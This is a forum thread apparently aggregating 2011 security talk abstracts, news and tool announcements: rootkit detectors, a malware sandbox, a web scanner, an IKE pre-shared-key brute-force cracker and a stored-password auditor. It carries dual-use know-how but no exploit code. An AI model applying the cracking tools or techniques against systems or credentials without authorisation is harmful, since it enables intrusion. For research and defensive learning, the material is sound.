Nytro

[h=1]BlackHat USA 2011: SSL And The Future Of Authenticity[/h]Speaker: MOXIE MARLINSPIKE In the early 90's, at the dawn of the World Wide Web, some engineers at Netscape developed a protocol for making secure HTTP requests, and what they came up with was called SSL. Given the relatively scarce body of knowledge concerning secure protocols at the time, as well the intense pressure that everyone at Netscape was working under, their efforts can only be seen as incredibly heroic. But while it's amazing that SSL has endured for as long as it has, some parts of it -- particularly those concerning Certificate Authorities -- have always caused some friction, and have more recently started to cause real problems. This talk will provide an in-depth examination of the current problems with authenticity in SSL, discuss some of the recent high-profile SSL infrastructure attacks in detail, and cover some potential strategies for the future. It will conclude with a software release that aims to definitively fix the disintegrating trust relationships at the core of this fundamental protocol. For more information or download the video visit: Black Hat

28c3: 802.11 Packets in Packets Travis Goodspeed: 802.11 Packets in Packets A Standard-Compliant Exploit of Layer 1 http://www.youtube.com/watch?v=thUM323ufG0 New to 2011, Packet-in-Packet exploits allow for injection of raw radio frames into remote wireless networks. In these exploits, an attacker crafts a string that when transmitted over the air creates the symbols of a complete and valid radio packet. When radio interference damages the beginning of the outer packet, the receiver is tricked into seeing only the inner packet, allowing a frame to be remotely injected. The attacker requires no radio, and injection occurs without a software or hardware bug. This lecture presents the first implementation of Packet-in-Packet injection for 802.11B, allowing malicious PHY-Layer frames to be remotely injected. The attack is standards-compliant and compatible with all vendors and drivers. Unlike the simpler implementations for 802.15.4 and 2FSK, 802.11B presents a number of unique challenges to the PIP implementer. A single packet can use up to three symbol sets and three data-rates, switching rates once within the header and a second time for the beginning of the body. Additionally, a 7-bit scrambler randomizes the encoding of each packet, so the same string of text can be represented 128 different ways at the exact same rate and encoding. This lecture presents the first implementation of Packet-in-Packet injection for 802.11B, allowing malicious PHY-Layer frames to be remotely injected. The attack is standards-compliant and compatible with all vendors and drivers. As a demo, we intend to present a malicious string which can be embedded in any file with lots of slack space, such as an ISO image. When this image is downloaded over HTTP on 802.11B, beacon frames will be injected. For the demo, we will be injecting the SSID stack buffer overflow frames from Uninformed Volume 6. Sursa: https://www.youtube.com/user/28c3#p/u/10/thUM323ufG0

28c3: Defending mobile phones Karsten Nohl, Luca Melette: Defending mobile phones http://www.youtube.com/watch?v=XK_Jx1993Eg Cell phone users face an increasing frequency and depth of privacy intruding attacks. Defense knowledge has not scaled at the same speed as attack capabilities. This talk intends to revert this imbalance. Most severe attack vectors on mobile phones are due to an outdated technology base that lacks strong cryptographic authentication or confidentiality. Given this discrepancy between protection need and reality, a number of countermeasures were developed for networks and phones to better protect their users. We explain the most important measures and track their deployment. Furthermore, we will release tools to measure the level of vulnerability of networks. Sharing the results of these measurements will hopefully create problem awareness and demand for more security by phone users around the world. Sursa: https://www.youtube.com/user/28c3#p/u/5/XK_Jx1993Eg

Mathias Payer: String Oriented Programming Circumventing ASLR, DEP, and Other Guards The protection landscape is changing and exploits are getting more and more sophisticated. Exploit generation toolkits can be used to construct exploits for specific applications using well-defined algorithms. We present such an algorithm for leveraging format strings and introduce string oriented programming. String oriented programming takes format string exploits to the next level and turns an intrusion vector that needs hand-crafted exploits into arbitrary code execution. Similar to return oriented programming or jump oriented programming string oriented programming does not rely on existing code but concatenates gadgets in the application using static program analysis. This talk presents an algorithm and a technique that takes a vulnerable application that contains a format string exploit as a parameter and constructs a format string exploit that can be used to inject a dynamic jump oriented programming dispatcher into the running application. String oriented programming circumvents ASLR, DEP, and ProPolice. Sursa: https://www.youtube.com/user/28c3#p/u/3/bjcm391lkyA

Dan Kaminsky: Black Ops of TCP/IP 2011 Sursa: https://www.youtube.com/user/28c3#p/u/1/KYS0XHzxOsY De urmarit, se vorbeste despre multe lucruri interesante.

Anonymusii = Gigi Becali mai degraba.

Tot astia ziceau ca nu ei sunt autorii atacului, deoarece nu se incadreaza in aria lor de activitate, ca nu este nimic etic in aceasta actiune. Acum na, imi pun si eu o masca si spun ca cei de la CIA sunt in spatele atacului, o bag pe aia cu "We are anonimusii" si gata, crede tot poporul ce zic eu.

Mi-am cumparat si eu azi doua carti clasice: - F.M. Dostoievski - Crima si pedeapsa - Vladimir Nabokov - Lolita

Official Android Market host many Malware Games F-Secure researchers recently found malware in the Android Market disguised as free versions of popular games. Disguising malware as a free version of a popular game (such as Cut the Rope and Assassin’s Creed) seems to be a popular tactic that the bad guys are using to scam users of Google’s Android Market app store. Overnight more malware appeared in Google’s official app repository. The Trojanized games have been uploaded by a company calling itself Eldar Limited. This is the second time in two weeks malware disguised as free games has been uploaded to the Android Market. Google's app police managed to detect this fraud and quickly removed it from the Android Market. While the apps are still listed on AppBrain and AndroidZoom, the links will direct users back to the official Android Market where they have already been removed. "These have now been removed by Google, but their appearance in the official Android Market in the first place is worrying. Not only is Google putting Android users into contact with malware, it is also allowing the brand names of reputable companies to be tarnished by letting the bad guys upload this stuff to the Android Market in the first place." Zdnet posted. F-Secure posted a tip to help you figure out whether a free app is genuine or not : A useful tip for users out there is to search for the paid version of the app and take note of the developer’s name. If the name on both paid and free versions matches, then it is very likely to be a safe app. Otherwise, don’t proceed with the download. Sursa: http://thehackernews.com/2011/12/official-android-market-host-many.html

Remote Windows Kernel Exploatation - A step into Ring0 Blackhat US 05. Authors: Barnaby Jack Download: www.blackhat.com/presentations/bh-usa-05/BH_US_05-Jack_White_Paper.pdf

Short key IDs are bad news (with OpenPGP and GNU Privacy Guard) Mon, 26 Dec 2011 Summary: It is important that we (the Debian community that relies on OpenPGP through GNU Privacy Guard) stop using short key IDs. There is no vulnerability in OpenPGP and GPG. However, using short key IDs (like 0x70096AD1) is fundementally insecure; it is easy to generate collisions for short key IDs. We should always use 64-bit (or longer) key IDs, like: 0x37E1C17570096AD1 or 0xEC4B033C70096AD1. TL;DR: This now gives two results: gpg --recv-key 70096AD1 Some background, and my two keys Years ago, I read dkg's instructions on migrating the Debian OpenPGP infrastructure. It told me that the time and effort I had spent getting my key into the strong set wasn't as useful as I thought it had been. I felt deflated. I had put in quite a bit of effort over the years to strongly-connect my key to a variety of signatures, and I had helped people get their own keys into the strong set this way. If I migrated off my old key and revoked it, I'd be abandoning some people for whom I was their only link into the strong set. And what fun it was to first become part of the strong set! And all the eyebrows I raised when I told people I was going meet up with people I met on a website called Biglumber... I even made it my Facebook.com user ID. So if I had to generate a new key, I decided I had better really love the short key ID. But at that point, I already felt pretty attached to the number 0x70096AD1. And I couldn't come up with anything better. So that settled it: no key upgrade until I had a new key whose ID is the same as my old key. That dream has become a reality. Search for my old key ID, and you get two keys! $ gpg --keyserver pgp.mit.edu --recv-key 0x70096AD1 gpg: requesting key 70096AD1 from hkp server pgp.mit.edu gpg: key 70096AD1: public key "Asheesh Laroia <asheesh@asheesh.org>" imported gpg: key 70096AD1: public key "Asheesh Laroia <asheesh@asheesh.org>" imported gpg: no ultimately trusted keys found gpg: Total number processed: 2 gpg: imported: 2 (RSA: 1) A neat stunt abusing --refresh-keys Thanks to a GNU Privacy Guard bug, it is super easy to get my new key. Let's say that, like many people, you only have my old key on your workstation: $ gpg --list-keys | grep 70096AD1 pub 1024D/70096AD1 2005-12-28 Just ask GPG to refresh: $ gpg --keyserver pgp.mit.edu --refresh-keys gpg: refreshing 1 key from hkp://pgp.mit.edu gpg: requesting key 70096AD1 from hkp server pgp.mit.edu gpg: key 70096AD1: public key "Asheesh Laroia <asheesh@asheesh.org>" imported gpg: key 70096AD1: "Asheesh Laroia <asheesh@asheesh.org>" not changed gpg: Total number processed: 2 gpg: imported: 1 (RSA: 1) gpg: unchanged: 1 gpg: no ultimately trusted keys found Now you have two: $ gpg --list-keys | grep 70096AD1 pub 1024D/70096AD1 2005-12-28 pub 4096R/70096AD1 2011-03-11 There is a bug filed in GNU Privacy Guard about this. It has a patch attached. There is, at the moment, no plan for a new release. A faster attack, but nothing truly new My friend Venkatesh tells me there is an apocryphal old Perl script that could be used to generate key ID collisions. Here in the twenty-first century, l33t h4x0rz like Georgi Guninski are trying to create collisions. In May 2010, "halfdog" posted a note to the full-disclosure list that generates PGP keys with chosen short key IDs. I haven't benchmarked or tested that tool, but I have used a different tool (private for now) that can generate collisions in a similar fashion. It takes about 3 hours to loop through all key IDs on a dinky little netbook. You don't have to use any of these tools. You can just rent time on an elastic computing service or a botnet, or your own personal computer, and generate keys until you have a match. I think that it's easy to under-estimate the seriousness of this problem: tools like the PGP Key Pathfinder should be updated to only accept 64-bit (or longer) key IDs if we want to trust their output. My offer: I will make you a key I've been spending some time wondering: What sort of exciting demonstration can I create to highlight that this is a real problem? Some ideas I've had: Publish a private/public key pair whose key ID is the same as Phil Zimmerman's, original author of PGP Publish a private/public key pair whose key ID is the same as Werner Koch's, maintainer of GNU Privacy Guard Publish a set of public keys that mimic the entire PGP strong set, except where I control the private key of all these keys The last one would be extremely amusing, and would be a hat-tip to some work discussed in Raph Levien's Google Tech Talk about Advogato. For now, here is my offer: If you send me a request signed with a key in the strong set, I will create a 4096-bit RSA public/private key pair whose 32-bit key ID is one greater than yours. So if you are 0x517DD4E4 I will generate 0x517DD4E5. I will post the keys here, along a note about who requested it, and instructions on how to import them into your keyring. (Note: I will politely decline to create a new key whose 32-bit key ID would create a collision; apologies if your key ID is just one away from someone else's.) P.S. The prize for best sarcastic retort goes to Ian Jackson. He said, "I should go and create a lot of keys with your key ID. I'll set the real name to 'Not Asheesh Laroia' so everyone is totally clear about what is going on." Sursa: Short key IDs are bad news (with OpenPGP and GNU Privacy Guard) :: Asheeshworld

[h=1]RootkitRevealer v1.71[/h] By Bryce Cogswell and Mark Russinovich Published: November 1, 2006 [h=3]Introduction[/h]RootkitRevealer is an advanced rootkit detection utility. It runs on Windows XP (32-bit) and Windows Server 2003 (32-bit), and its output lists Registry and file system API discrepancies that may indicate the presence of a user-mode or kernel-mode rootkit. RootkitRevealer successfully detects many persistent rootkits including AFX, Vanquish and HackerDefender (note: RootkitRevealer is not intended to detect rootkits like Fu that don't attempt to hide their files or registry keys). If you use it to identify the presence of a rootkit please let us know! The reason that there is no longer a command-line version is that malware authors have started targetting RootkitRevealer's scan by using its executable name. We've therefore updated RootkitRevealer to execute its scan from a randomly named copy of itself that runs as a Windows service. This type of execution is not conducive to a command-line interface. Note that you can use command-line options to execute an automatic scan with results logged to a file, which is the equivalent of the command-line version's behavior. [h=3]What is a Rootkit?[/h]The term rootkit is used to describe the mechanisms and techniques whereby malware, including viruses, spyware, and trojans, attempt to hide their presence from spyware blockers, antivirus, and system management utilities. There are several rootkit classifications depending on whether the malware survives reboot and whether it executes in user mode or kernel mode. Persistent Rootkits A persistent rootkit is one associated with malware that activates each time the system boots. Because such malware contain code that must be executed automatically each system start or when a user logs in, they must store code in a persistent store, such as the Registry or file system, and configure a method by which the code executes without user intervention. Memory-Based Rootkits Memory-based rootkits are malware that has no persistent code and therefore does not survive a reboot. User-mode Rootkits There are many methods by which rootkits attempt to evade detection. For example, a user-mode rootkit might intercept all calls to the Windows FindFirstFile/FindNextFile APIs, which are used by file system exploration utilities, including Explorer and the command prompt, to enumerate the contents of file system directories. When an application performs a directory listing that would otherwise return results that contain entries identifying the files associated with the rootkit, the rootkit intercepts and modifies the output to remove the entries. The Windows native API serves as the interface between user-mode clients and kernel-mode services and more sophisticated user-mode rootkits intercept file system, Registry, and process enumeration functions of the Native API. This prevents their detection by scanners that compare the results of a Windows API enumeration with that returned by a native API enumeration. Kernel-mode Rootkits Kernel-mode rootkits can be even more powerful since, not only can they intercept the native API in kernel-mode, but they can also directly manipulate kernel-mode data structures. A common technique for hiding the presence of a malware process is to remove the process from the kernel's list of active processes. Since process management APIs rely on the contents of the list, the malware process will not display in process management tools like Task Manager or Process Explorer. Download: http://download.sysinternals.com/Files/RootkitRevealer.zip Sursa: RootkitRevealer Via: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC

[h=1]Sophos Anti-Rootkit[/h][h=2]Free rootkit detection and removal tool[/h] [h=3]Important note[/h] We are currently working to enhance the detection power of the Sophos Anti-Rootkit Tool to better find and remove the latest forms of rootkits. This updated version will be available to download in February 2012. Should you have any questions about the current version of this tool, please visit our SophosFreeTalk Community. [h=3]Rootkit scanning, detection and removal[/h] Our free software, Sophos Anti-Rootkit scans, detects and removes any rootkit that is hidden on your computer using advanced rootkit detection technology. Rootkits can lie hidden on computers and remain undetected by antivirus software. Although new rootkits can be prevented from infecting the system, if you had any rootkits before you installed your antivirus, they may never be revealed. Removing rootkits without compromising system integrity is particularly challenging and needs to be done with care. [h=3]Simplified management[/h] Using Sophos Anti-Rootkit is easy. Whether you use its simple graphical user interface or run it from the command line, you can easily detect and remove any rootkits on your computer. [h=3]Easy to use[/h] Sophos Anti-Rootkit provides an extra layer of protection, by safely and reliably detecting and removing any rootkit that might have hidden itself on your system. [h=3]Stay free of rootkits[/h] As part of its complete protection of endpoint computers, Sophos Endpoint Security and Data Protection has an integrated detection functionality that removes and prevents them being installed onto your desktops, laptops and servers. Download: http://www.sophos.com/en-us/products/free-tools/sophos-anti-rootkit/download.aspx Sursa: Sophos Anti-Rootkit - Free Rootkit Detection and Removal Tool Via: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC

Trend Micro? RootkitBuster? 5.00 Beta Released: 2011-08-15 Download: http://www.trendmicro.com/ftp/products/rootkitbuster/RootkitBuster_5.00.1041.zip Sursa: Top 3 Tools To Remove Rootkits and Prevent Them from Infecting Your PC

[h=1]Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich[/h]December 26, 2011 | Devindra Hardawar Well that didn’t take very long. Amazon’s Kindle Fire tablet — which you’ve likely seen gifted quite a bit this holiday season — has been hacked to run a “pre-alpha” version of Android 4.0 Ice Cream Sandwich. You can thank the intrepid hackers over at the xda-developers forum for the release, which marks the first time Android 4.0 has hit the Kindle Fire. A hack such as this is likely the only way Kindle Fire owners can get their hands on Android 4.0. Given the hefty hardware requirements for Android 4.0 devices, plus Amazon’s need for a highly customized user interface on the Kindle Fire, you’ll likely never see an official Ice Cream Sandwich release on the tablet. The hack, which is based on the custom Android firmware CyanogenMod 9, is certainly far from complete. Audio and graphical glitches (especially while playing videos) abound, and touch screen interaction seems fairly unresponsive, according to the above video from Liliputing. Still, it’s a mighty first step for Kindle Fire hackers, and it’s likely the first of many such releases from various development groups. Given it’s $200 price and wide availability, the Kindle Fire is the new target for any hacker looking to make a name for themselves. Via The Verge Sursa: Kindle Fire gets a bite of Android 4.0 Ice Cream Sandwich | VentureBeat

Cuckoo Sandbox Automated Malware Analysis System In three words, Cuckoo Sandbox is a malware analysis system. Its goal is to provide you a way to automatically analyze files and collect comprehensive results describing and outlining what such files do while executed inside an isolated environment. It's mostly used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. But it can do much more... It's up to you to discover what and how. Some of the results that Cuckoo generates are: Trace of performed relevant win32 API calls Dump of network traffic generated during analysis Creation of screenshots taken during analysis Dump of files created, deleted and downloaded by the malware during analysis Trace of assembly instructions executed by malware process In addition, Cuckoo allows you to: Automate submission of analysis tasks Create analysis packages to define custom operations and procedures for performing an analysis Run multiple virtual machines concurrently Script the process and correlation of analysis results data Script and automate the generation of reports in the format you prefer Download Current Cuckoo Sandbox's version is 0.3. http://www.cuckoobox.org/downloads/0.3/cuckoo_0.3.tar.gz Docs: http://www.cuckoobox.org/doc/0.3/latex/CuckooSandbox.pdf Demo: Sursa: Cuckoo Sandbox

GoDaddy loses 21,000 domains in a day By Natalie Weinstein on Dec 27, 2011 Domain registrar Go Daddy lost over 21,000 domains yesterday. It could be a coincidence--or it could be the result of the company's PR debacle over its support for the Stop Online Piracy Act. Yesterday, Go Daddy actually reversed course and dropped its support for the controversial legislation. "Go Daddy will support it when and if the Internet community supports it," Go Daddy CEO Warren Adelman announced in a statement. SOPA, introduced in Congress this fall, would make it easier for the Justice Department to shut down sites allegedly dedicated to piracy. An anti-Go Daddy thread on social site Reddit led to the creation of Godaddyboycott.org, a site set up to let people amass their disapproval with the company's support of SOPA. While 21,054 domains transferred out Friday of Domaincontrol.com--which is managed by Go Daddy--it is only fair to note that 20,034 transferred in the same day, according to domain tracker Dailychanges.com According to techie site TheNextWeb.com, though, the transfers-out have been building over the course of the week, with 8,800 reported on Monday and 14,500 on Wednesday. Go Daddy did not immediately respond to CNET's request for comment. Via CNET Sursa: GoDaddy loses 21,000 domains in a day - Crave - CNET Asia

[h=1]Audit Windows Passwords With Password Security Scanner[/h] Keeping track of all accounts and passwords can be a daunting task for some users. One reason for that is that most use multiple applications that may require passwords. Think of desktop email clients, instant messengers or web browsers for instance. Even if you are using a password manager like KeePass, you will usually have programs that save account information and passwords for you. That’s a problem if you want an overview of all passwords, or want to make sure that all are secure. The new Nirsoft application Password Security Scanner has been designed to audit Windows passwords. The first release supports auditing passwords stored in Internet Explorer, Mozilla Firefox, MSN, Microsoft Outlook, Windows Live Mail and, dialup and vpn passwords. The program scans the operating system for all supported programs and displays all passwords that it finds in a list. Password Security Scanner lists the item name (usually a domain name), the type (browser, email), application the password was found in, the username, password length, the password strength, and even the type of characters used by the password. Firefox users need to disable the master password if set up, as it blocks access to the password list. This is done under Options > Security > Master Password in the browser. The password length and strength give detailed information about a password’s security. The information may for instance be used to change weak passwords on the system. Keep in mind though that all passwords read by the application are accessibly openly on the system. Someone with direct access to the PC could retrieve the account information regardless of password length. Users can however use the information to delete passwords that are out in the open on their system. While that may not always be a practicable solution, it may work in some cases. The data can be exported into text, csv and xml files, and HTML reports. Windows users can download the portable program from the official program website. Sursa: Audit Windows Passwords With Password Security Scanner

[h=1]This is what a 5MB hard drive looked like in 1956[/h] 26th December 2011 by Zee ‘In September 1956 IBM launched the 305 RAMAC, the first ‘SUPER’ computer with a hard disk drive (HDD). The HDD weighed over a ton and stored 5 MB of data.’ Texomatube via Retronaught (Thanks @Atul) Sursa: What a 5MB Hard Drive Looked Like in 1956

Hacktivity 2011 - Yaniv Miron: SCADA Dismal or bang-bang SCADA Sursa: Hacktivity 2011 - Yaniv Miron: SCADA Dismal or bang-bang SCADA on Vimeo

[h=1]Naval researchers pioneer TCP-based spam detection[/h] [h=2]A group of researchers has built a SpamAssassin that detects spam by TCP usage[/h] By Joab Jackson December 23, 2011, 4:39 PM — A group of researchers from the U.S. Naval Academy has developed a technique for analyzing email traffic in real-time to identify spam messages as they come across the wire, simply using information from the TCP (Transmission Control Protocol) packets that carry the messages. This approach could be a useful addition to the arsenal of today's spam-fighting techniques, observers argue, in that, unlike other typical spam fighting approaches, the content of the email does not have to be scanned. The work "advanced both the science of spam fighting and ... worked through all the engineering challenges of getting these techniques built into the most popular open-source spam filter," said Massachusetts Institute of Technology computer science research affiliate Steve Bauer, who was not involved with the work. "So this is both a clever bit of research and genuinely practical contribution to the persistent problem of fighting spam." Researchers Robert Beverly, Georgios Kakavelakis and Joel Young built a plug-in for the SpamAssassin mail filter, called SpamFlow, that incorporates their analysis techniques. They presented their work at the Usenix Large Installation System Administration (LISA) conference arlier this month in Boston. In the paper that accompanied the presentation, the researchers showed that spam email blasts have certain characteristics at the networking transport layer. Signal analysis of factors such as timing, packet reordering, congestion and flow control can reveal the work of a spam-spewing botnet. "A lot of spam comes from spambots, which are sending as fast as they can and congesting their local uplink," Beverly said. "So you can detect them by looking really hard at the TCP stream." Thus far, earlier techniques developed for analyzing spam at the network transport layer have been offline, which is to say, the email traffic is analyzed as a batch, and the results can be used later. The naval researchers have developed an architecture for analyzing network traffic as it comes over the wire. For the implementation, they used the the SpamAssassin email filter. SpamAssassin has a plug-in architecture for incorporate new filtering techniques. "We have a daemon that captures all the packets and looks timing and other congestion characteristics of the traffic stream," Beverly said. The plug-in can learn to identify and detect spam without human intervention. In tests, SpamFlow was able to correctly identify spam over 95 percent of the time, after a reception of 1,000 emails. The ability to detect a spam message without actually examining the contents of the message would be handy in a number of situations, noted Bruce Davie, a Cisco fellow and visiting lecturer at MIT. Davie is familiar with though not involved in the work. An Internet service provider could apply the detection algorithm without violating users' privacy. It can be used to detect messages that are encrypted, such as those traveling over an encrypted link. It can also be used to detect other forms of malicious traffic, such as port scans from botnet hosts. "Overall, I see it as a generally useful tool in the fight against malicious traffic," Davie said. "You can combine it with traditional anti-spam techniques to improve accuracy." Currently, the team is beta testing the software at a number of locations. They plan to release it as open-source software afterward. The U.S. National Science Foundation funded part of this work, under the Software Development for Cyberinfrastructure (SDCI) program. Sursa: Naval researchers pioneer TCP-based spam detection | ITworld

Sandcat Pro v4.2.8 adds NoSQL Injection detection By MaxiSoler on 27 December 2011 in Tools with No Comments Sandcat combines Syhunt’s state-of-the-art, multi-process scanning technologies with the incredibly fast Lua language to perform remote web application security scans. While spidering a web site and hunting vulnerabilities, Sandcat emulates a modern, HTML 5-aware web browser, making sure every web application gets fully tested. Changelog v4.2.8 This version adds techniques for detecting vulnerabilities in web applications using NoSQL database engines and web systems supporting server-side JavaScript execution. This includes NoSQL injection, blind NoSQL injection & Denial-of-Service vulnerabilities. Also the enhanced versions of the Sandcat Code scanner with source code checks for these specific vulnerability classes, and publishing an article (Time-Based NoSQL Injection, available here) that highlights additional risks involving server-side JavaScript execution not restricted to NoSQL database engines. Download: http://www.syhunt.com/?n=Sandcat.Download Sursa: Sandcat Pro v4.2.8 adds NoSQL Injection detection

[h=3]IKECrack[/h]IKECrack is an open source IKE/IPSec authentication crack tool. This tool is designed to bruteforce or dictionary attack the key/password used with Pre-Shared-Key [PSK] IKE authentication. The open source version of this tool is to demonstrate proof-of-concept, and will work with RFC 2409 based aggressive mode PSK authentication. Our SourceForge development area is at IKECrack | Free Security & Utilities software downloads at SourceForge.net [h=4]Presentation Materials and Additional Tools[/h] My ToorCon 2K2 preso on IKE hacking can be downloaded here The IKEProber tool mentioned in the preso can be downloaded here [h=4]IKE Agressive Mode BruteForce Summary[/h] Aggressive Mode IKE authentication is composed of the following steps: 1 - Initiating client sends encryption options proposal, DH public key, random number [nonce_i], and an ID in an un-encrypted packet to the gateway/responder. 2 - Responder creates a DH public value, another random number [nonce_r], and calculates a HASH that is sent back to the initiator in an un-encrypted packet. This hash is used to authenticate the parties to each other, and is based on the exchange nonces, DH public values, the initiator ID, other values from the initiator packet, and the Pre-Shared-Key [PSK]. 3 - The Initiating client sends a reply packet also containing a HASH, but this response is normally sent in an encrypted packet. IKECrack utilizies the HASH sent in step 2, and attempts a realtime bruteforce of the PSK. This involves a HMAC-MD5 of the PSK with nonce values to determine the SKEYID, and a HMAC-MD5 of the SKEYID with DH pubkeys, cookies, ID, and SA proposal. In practice, SKEYID and HASH_R are calculated with the Hash cipher proposed by the initiator, so could actually be either SHA1 or MD5 in HMAC mode. [h=4]Project Details[/h] IKECrack utilizes components from the following OpenSource/PublicDomain programs MDCrack HiFn Linux Drivers - HiFn makes one of the better commercial encryption/compression accelerators. I have access to 7751 based PCI cards, and plan one for offloading MD5, SHA1,DES, and 3DES Author: Anton T. Rager Ron Rivest's MD5 Simeon Pilgrim's Reverse MD5 MD5 and HMAC-MD5 PerlMods libpcap [h=4]Performance[/h] Initial tesing with Perl based IKECrack shows numbers of 18,000 tests per second with a PIII 700, and can bruteforce 3 chars of ucase/lcase/0-9 in 13 seconds. MDCrack [a MD5 bruteforce tool] can achieve 1.5 million keys per second with pure MD5 and a PIII 700. PSK bruteforcing consists of 4 MD5's, and 4 64 byte XORs....but should still be able to achieve 375,000 IKE keys per second. Preliminary tests in C have shown 26,000 keys per second with un-optimized routines. I'm hoping that Simeon Pilgrim's MD5 routines will speed this up a bit more. [h=4]Cool Links[/h] Other projects we are considering integrating into IKECrack dkbf - An open source distributed NT LANMan/Hash cracker using MPI - An IKECrack cluster! Download: http://sourceforge.net/projects/ikecrack/files/latest/download Sursa: IKECrack - Bruteforce crack for IPSec

[h=2]A Robot… That Can See Through Walls![/h] posted Dec 26th 2011 3:56pm by Jeremy Cook Robots on four wheels are fun on their own merits, but one thing that most lack is the ability to see through walls. With it’s onboard radar system, this bot is equipped to see objects that a person couldn’t normally detect on the other side of the wall. Although some of the more “nuts and bolts” details of this build are missing, the robot uses an Ultra-Wideband Radar system called the [D1] Radar System. This system can, according to their documentation, “Avoid false positives caused by vapor, dust, smoke, rain or other small particles.” Apparently this means drywall as well if programmed correctly. In the video after the break, the robot’s sensor package is programmed to ignore anything within 1.5 meters. This allows the robot to mirror the movement of the apparent shelving unit on the other side. This sensor could certainly have some interesting robotics applications besides imitating a rolling shelf, so we’re excited to see what it will be used for! Sursa: A Robot… That Can See Through Walls! - Hack a Day

The Life of Binaries Creator: Xeno Kovah License: Creative Commons Share-Alike (http://creativecommons.org/licenses/by-sa/3.0/) Lab Requirements: Requires a Windows system with Visual C++ Express Edition, Windows DDK or WDK kernel module compilation environment, and WinDbg. Requires a Windows guest OS running in VMWare Player or VMWare Server in order to do kernel debugging with WinDbg from the host OS. Recommended Class Duration: 3 days (class previously taught in 2 days which was too little) Creator Available for Training: Yes Author Comments: Topics include but are not limited to: •Scanning and tokenizing source code. •Parsing a grammar. •Different targets for x86 assembly object files generation. (E.g. relocatable vs. position independent code). •Linking object files together to create a well-formed binary. •Detailed descriptions of the high level similarities and low level differences between the Windows PE and Linux ELF binary formats. (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides) •How an OS loads a binary into memory and links it on the fly before executing it. Along the way we discuss the relevance of security at different stages of a binary’s life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way which malware “packers” duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR). Lab work includes: •Manipulating compiler options to change the type of assembly which is output •Manipulating linker options to change the structure of binary formats •Reading and understanding PE files with PEView •Reading and understanding ELF files with Readelf (NOTE: we didn't get to this in the class where the video was recorded, but the materials are in the slides) •Using WinDbg and/or GDB to watch the loader dynamically link an executable •Using Thread Local Storage (TLS) to obfuscate control flow and serve as a basic anti-debug mechanism •Creating a simple example virus for PE •Analyze the changes made to the binary format when a file is packed with UPX •Using the rootkit technique of Import Address Table (IAT) hooking to subvert the integrity of a program’s calls to external libraries, allowing files to be hidden. Knowledge of this material is recommended, but not required, for future classes such as Rootkits, but is required for reverse engineering. To submit any suggestions, corrections, or explanations of things I didn’t know the reasons for, please email me at the address included in the slides. All Materials LoBSlidesOnly.zip LoBCodeOnly.zip Videos of the class hosted at archive.org. These are useful for students, but also more useful for potential instructors who would like to teach this material. By watching the video, you will better understand the intent of some slides which do not stand on their own. You are recommended to watch the largest size video so that the most possible text is visible without having to follow along in the slides: Online: Day 1 Part 1 Day 1 Part 2 Day 1 Part 3 Day 1 Part 4 Day 1 Part 5 Day 1 Part 6 Day 2 Part 1 Day 2 Part 2 Day 2 Part 3 Day 2 Part 4 Day 2 Part 5 Day 2 Part 6 Download videos: http://www.archive.org/download/TheLifeOfBinariesDay1Part1/PR_LifeOfBinariesDay1Part1.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part2/PR_LifeOfBinariesDay1Part2.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part3/PR_LifeOfBinariesDay1Part3.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part4/PR_LifeOfBinariesDay1Part4.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part5/PR_LifeOfBinariesDay1Part5.mp4 http://www.archive.org/download/TheLifeOfBinariesDay1Part6/PR_LifeOfBinariesDay1Part6.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part1/PR_LifeOfBinariesDay2Part1.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part2/PR_LifeOfBinariesDay2Part2.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part3/PR_LifeOfBinariesDay2Part3.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part4/PR_LifeOfBinariesDay2Part4.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part5/PR_LifeOfBinariesDay2Part5.mp4 http://www.archive.org/download/TheLifeOfBinariesDay2Part6/PR_LifeOfBinariesDay2Part6.mp4 Revision History: 09-06-2011 - Videos uploaded 02-16-2011 - Initial class content upload If you have used and modified this material, we would appreciate it if you submit your modified version for publishing here, so that all versions can benefit from your changes. Sursa: LifeOfBinaries